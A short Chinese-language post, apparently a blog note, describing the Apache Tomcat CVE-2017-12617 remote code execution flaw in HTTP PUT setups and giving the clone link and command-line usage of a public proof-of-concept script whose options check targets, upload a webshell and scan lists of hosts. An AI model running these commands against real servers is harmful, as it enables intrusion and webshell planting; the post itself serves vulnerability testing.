Apache Tomcat中发现的CVE-2017-12617严重远程代码执行(RCE)漏洞
影响启用了HTTP PUT的系统(通过将默认servlet的“只读”初始化参数设置为“false”)受到影响。如果默认servlet的参数只读设置为false,或者配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的Tomcat版本在所有操作系统上包含潜在危险的远程代码执行(RCE) WebDAV servlet的参数readonly被设置为false
POC:
git clone https://github.com/cyberheartmi9/CVE-2017-12617.git
用法:
选项:
-u, - url [::]检查目标网址是否易受攻击
-p, - pwn [::]生成webshell并上传
–l,–list [::] hosts list
[+]用法:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py –url http://127.0.0.1
./cve-2017-12617.py -u http: //127.0.0.1 -p pwn
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017- 12617.py –list hosts.txt
如题测试 没有改漏洞。